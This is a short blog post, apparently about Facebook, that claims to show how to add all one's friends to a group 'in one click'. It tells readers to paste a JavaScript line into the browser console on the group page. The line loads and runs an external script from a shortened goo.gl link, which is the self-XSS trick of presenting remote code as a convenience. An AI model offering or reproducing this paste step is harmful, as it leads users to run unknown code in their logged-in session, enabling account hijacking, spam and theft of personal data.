How To Add Your All Friends To Group Just One Click
0
How To Add Your All Friends To Group Just One Click
Hello friend's,Three weeks ago i told you about Need For Speed new game.Today
i came back with most useful JavaScript code.If you want add your
friends to some group you must add your friends to it one by one.it's
very boring task.So i'll tell you how to do it very easy way.
Follow these introductions.
Now Visit your group.(Ex : Free FB Timeline Cover).here we have two different ways to complete this step.
For Google Chrome User's
Now click Console tab and past this JavaScript in there.and press Enter.
document.body.appendChild(document.createElement('script')).src='http://goo.gl/lTHN7';
Now you can see your friends automatically adding your group.
For Firefox Usrer's
Now past this JavaScript in there.and press Enter
document.body.appendChild(document.createElement('script')).src='http://goo.gl/lTHN7';
After all friends adding you have to refresh you browser when you can see your group member count increased.